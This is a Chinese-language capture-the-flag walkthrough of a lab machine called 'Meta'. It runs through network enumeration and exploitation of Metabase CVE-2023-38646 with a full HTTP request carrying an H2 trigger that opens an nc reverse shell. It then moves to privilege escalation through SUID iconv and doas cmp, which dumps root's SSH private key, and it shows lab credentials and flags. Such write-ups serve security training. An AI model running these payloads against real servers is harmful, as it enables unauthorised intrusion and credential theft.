Mazesec_Meta

靶机来源：QQ群-660930334

难度：Easy

一、信息收集

1、主机探测

┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 11:01 CST
Nmap scan report for 192.168.2.1
Host is up (0.0012s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00064s latency).
MAC Address: 08:00:27:92:7B:DF (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.45
Host is up (0.00074s latency).
MAC Address: 08:00:27:F0:73:F0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.11 seconds

靶机IP：192.168.2.45

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.45                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 11:02 CST
Nmap scan report for 192.168.2.45
Host is up (0.00063s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp
MAC Address: 08:00:27:F0:73:F0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 33.70 seconds

开放端口：22、80、3000

2.详细信息扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,3000 192.168.2.45
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 11:03 CST
Nmap scan report for 192.168.2.45
Host is up (0.00072s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 10.0 (protocol 2.0)
80/tcp   open  http    nginx
|_http-title: Inspect Me
3000/tcp open  http    Jetty 11.0.14
|_http-server-header: Jetty(11.0.14)
|_http-title: Metabase
MAC Address: 08:00:27:F0:73:F0 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.31 seconds

3.udp扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.45                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 11:04 CST
Nmap scan report for 192.168.2.45
Host is up (0.00072s latency).
All 100 scanned ports on 192.168.2.45 are in ignored states.
Not shown: 54 closed udp ports (port-unreach), 46 open|filtered udp ports (no-response)
MAC Address: 08:00:27:F0:73:F0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 49.61 seconds

二、WEB渗透

1、80网站

访问80端口，没有东西

尝试进行目录扫描

┌──(root㉿kali)-[/miaosec]
└─# gobuster dir -u http://192.168.2.45 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.45
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              db,js,php,txt,html,bak,md
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 2315]
/.html                (Status: 403) [Size: 146]
/.html                (Status: 403) [Size: 146]
/_t26154829-5         (Status: 301) [Size: 162] [--> http://192.168.2.45/_t26154829-5/]
Progress: 1764480 / 1764488 (100.00%)
===============================================================
Finished
===============================================================

找到目录/_t26154829-5 ，访问后提示需要访问密钥

2、3000-Metabase

访问300端口，是一款开源的商业智能（BI）和数据可视化工具Metabase，版本v0.46.6

根据要求完成一系列操作，进入到管理页面

查看exploit-db，发现存在Pre-Auth Remote Code Execution漏洞

三、CVE-2023-38646

CVE-2023-38646

1. 找到setup-token

GET /api/session/properties HTTP/1.1
Host: 192.168.2.45:3000
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: metabase.DEVICE=dc533905-7513-4976-b91e-de339b1693a2
Connection: keep-alive

"setup-token":"5afdd49b-968f-4bc6-ab9d-5b1ceb24155a",

1. 反弹shell

POST /api/setup/validate HTTP/1.1
Host: 192.168.2.45:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 746

{
    "token": "5afdd49b-968f-4bc6-ab9d-5b1ceb24155a",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
            "advanced-options": false,
            "ssl": true,
"init": "CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('nc 192.168.2.4 4444 -e sh')\u000A$$"
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}

成功获取到shell

┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444                        
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.45] 38257
id
uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)

四、权限提升

1、获取welcome权限

查看/，发现是docker环境

ls -la /
total 88
drwxr-xr-x    1 root     root          4096 Dec 30 16:42 .
drwxr-xr-x    1 root     root          4096 Dec 30 16:42 ..
-rwxr-xr-x    1 root     root             0 Dec 30 16:42 .dockerenv
drwxr-xr-x    1 root     root          4096 Jun 29  2023 app
drwxr-xr-x    1 root     root          4096 Jun 29  2023 bin
drwxr-xr-x    5 root     root           320 Jan 16 07:16 dev
drwxr-xr-x    1 root     root          4096 Dec 30 16:42 etc
drwxr-xr-x    1 root     root          4096 Dec 30 16:42 home
drwxr-xr-x    1 root     root          4096 Jun 14  2023 lib
drwxr-xr-x    5 root     root          4096 Jun 14  2023 media
drwxr-xr-x    2 metabase metabase      4096 Jan 15 15:06 metabase.db
drwxr-xr-x    2 root     root          4096 Jun 14  2023 mnt
drwxr-xr-x    1 root     root          4096 Jun 15  2023 opt
drwxrwxrwx    1 root     root          4096 Jan 15 14:40 plugins
dr-xr-xr-x  221 root     root             0 Jan 16 07:16 proc
drwx------    1 root     root          4096 Dec 30 16:54 root
drwxr-xr-x    2 root     root          4096 Jun 14  2023 run
drwxr-xr-x    2 root     root          4096 Jun 14  2023 sbin
drwxr-xr-x    2 root     root          4096 Jun 14  2023 srv
dr-xr-xr-x   13 root     root             0 Jan 16 07:16 sys
drwxrwxrwt    1 root     root          4096 Jan 16 07:37 tmp
drwxr-xr-x    1 root     root          4096 Jun 29  2023 usr
drwxr-xr-x    1 root     root          4096 Jun 14  2023 var

查看suid文件

find / -perm -4000 2>/dev/null
/usr/bin/iconv

查看etc/passwd

/usr/bin/iconv -f UTF-8 -t UTF-8 /etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
metabase:x:2000:2000:NIYPNWs7lXUEhwXF:/home/metabase:/bin/ash

找到用户metabase下面存在一个字符串NIYPNWs7lXUEhwXF

根据80端口，提示需要密钥，成功进入

随便尝试127.0.0.1，提示我们需要包含.meta.dsz

随便构造一个域名http://192.168.2.4:4444/a.meta.dsz，kali开启监听

┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.45] 44852
GET /a.meta.dsz HTTP/1.1
Host: 192.168.2.4:4444
Authorization: Basic d2VsY29tZTpOUGtBMnNMbmJRNEVPV3l6
Accept: */*

成功获取到一串字符Basic d2VsY29tZTpOUGtBMnNMbmJRNEVPV3l6 进行解密 找到用户welcome和密码NPkA2sLnbQ4EOWyz

获取到用户welcome的权限

┌──(root㉿kali)-[~/miaosec]
└─# ssh welcome@192.168.2.45 
welcome@192.168.2.45's password: 
              _                          
__      _____| | ___ ___  _ __ ___   ___ 
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
 \ V  V /  __/ | (_| (_) | | | | | |  __/
  \_/\_/ \___|_|\___\___/|_| |_| |_|\___|
                                         
Meta:~$ id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)

2、获取root权限

查看suid权限

Meta:~$ find / -perm -4000 2>/dev/null
/tmp/sh
/bin/bbsuid
/usr/bin/doas

doas (do as)是 Linux] 和类Unix系统中的一个轻量级、安全且简洁的权限提升工具，用于以其他用户（通常是root）的身份执行命令，是传统sudo的替代品，核心理念是提供更易审计和更安全的特权管理方式，通过其简单直观的配置文件 /etc/doas.conf 限制用户能运行哪些命令

枚举doas可用的命令

/tmp $ sh doas.sh 
[*] 开始 Doas 智能扫描...
[*] 原理: timeout <time> doas -n <cmd> (捕获报错文本而非退出
码)
---------------------------------------------------
[*] 正在扫描常见 GTFOBins 列表...
doas.sh: line 22: ]]: not found
[+] 发现潜规则! -> /usr/bin/cmp
 回显样本: BusyBox v1.37.0 (2025-11-21 22:40:56 UTC) multi-call binary....
---------------------------------------------------
[*] 正在扫描 /usr/bin 和 /bin 下的所有可执行文件 (可能较
慢)...
doas.sh: line 22: ]]: not found
[+] 发现潜规则! -> /usr/bin/cmp
 回显样本: BusyBox v1.37.0 (2025-11-21 22:40:56 UTC) multi-call binary....
---------------------------------------------------
[*] 扫描结束。

发现cmp命令可用 尝试读取root用户的私钥

/tmp $ doas /usr/bin/cmp -l /root/.ssh/id_ed25519 /dev/zero | while read _ oct _; do printf "\\$oct"; done
--cmp: EOF on /root/.ssh/id_ed25519
---BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBOyR8jMxEBxbwYWrDW+ozQrBbZ0c0WZxh4MPVngjRfrwAAAJBoCUTlaAlE
5QAAAAtzc2gtZWQyNTUxOQAAACBOyR8jMxEBxbwYWrDW+ozQrBbZ0c0WZxh4MPVngjRfrw
AAAECqwfHdqWeyCNBnSseB6RD608XQ+rqLO0UYSDVXj6I3ZU7JHyMzEQHFvBhasNb6jNCs
FtnRzRZnGHgw9WeCNF+vAAAACXJvb3RATWV0YQECAwQ=
-----END OPENSSH PRIVATE KEY-----

进行连接

┌──(root㉿kali)-[/tmp]
└─# ssh root@192.168.2.45 -i id
              _                          
__      _____| | ___ ___  _ __ ___   ___ 
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
 \ V  V /  __/ | (_| (_) | | | | | |  __/
  \_/\_/ \___|_|\___\___/|_| |_| |_|\___|
                                         
Meta:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

五、查看FLAG

Meta:~# cat /root/root.txt 
flag{root-7c577b6ec894f1a5ce0a5800d361a962}

/usr/bin/iconv -f UTF-8 -t UTF-8 /root/user.txt 
flag{user-76eb20838e44a9ef2f72a763632ef061}